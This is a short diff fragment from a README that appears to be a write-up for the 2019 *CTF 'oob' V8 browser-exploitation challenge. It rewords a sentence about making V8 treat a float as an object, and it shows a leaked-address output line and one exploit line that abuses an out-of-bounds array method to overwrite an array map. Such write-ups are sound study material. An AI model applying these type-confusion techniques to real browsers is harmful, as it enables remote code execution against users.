jackfromeast/browser-dojo/v8/2019-star-ctf-oob-v8/README.md

 // [+] addr of temp_obj: 0x2c4b4c4eab1
 ```

-In contrast, we can foo the V8 to treat an arbitrary float value (4 bytes) as an object.
+In contrast, we can foo the V8 to treat an arbitrary float value as an object.

 ```
 fl_arr.oob(map1);